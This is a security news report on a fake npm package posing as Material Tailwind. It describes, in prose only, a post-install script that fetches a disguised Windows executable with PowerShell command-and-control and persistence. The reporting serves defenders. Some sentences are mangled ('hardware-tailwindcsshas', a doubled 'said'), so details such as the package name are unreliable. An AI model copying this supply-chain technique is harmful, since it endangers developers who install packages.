A malicious NPM package has been discovered posing as the legitimate software library for Material Tailwind, again indicating attempts by threat actors to distribute malicious code in open source software repositories.
The Tailwind material is a CSS based framework advertised by its maintainers as an “easy-to-use component library for Tailwind CSS and Material Design”.
“The malicious Material Tailwind npm package, while posing as a useful development tool, has an automatic post-installation script,” said Karlo Zanki, security researcher at ReversingLabs, said in a report shared with The Hacker News.
This script is designed to download a password-protected ZIP archive file that contains a Windows executable capable of running PowerShell scripts.
The malicious package, named hardware-tailwindcsshas been downloaded 320 times to date, all of which took place on September 15, 2022.
In a tactic that is becoming increasingly common, the threat actor appears to have taken great pains to mimic the functionality provided by the original package, while stealthily using a post-installation script to introduce the malicious functionality. .
This takes the form of a ZIP file fetched from a remote server that embeds a Windows binary, which is given the name “DiagnosticsHub.exe” presumably in an effort to pass off the payload as a diagnostic utility.
|Code for step 2 download|
The executable contains Powershell code snippets responsible for command and control, communication, manipulating processes, and establishing persistence through a scheduled task.
The attack also serves to highlight the software supply chain as an attack surface, which has grown in prominence due to the cascading impact attackers can have by distributing malicious code that can wreak havoc on multiple platforms and enterprise environments at once.
Supply chain threats also prompted the U.S. government to issue a memo directing federal agencies to “use only software that meets secure software development standards” and obtain “self-attestation for all third-party software”.
“Ensuring software integrity is critical to protecting federal systems against threats and vulnerabilities and reducing the overall risk of cyberattacks,” the White House said. said Last week.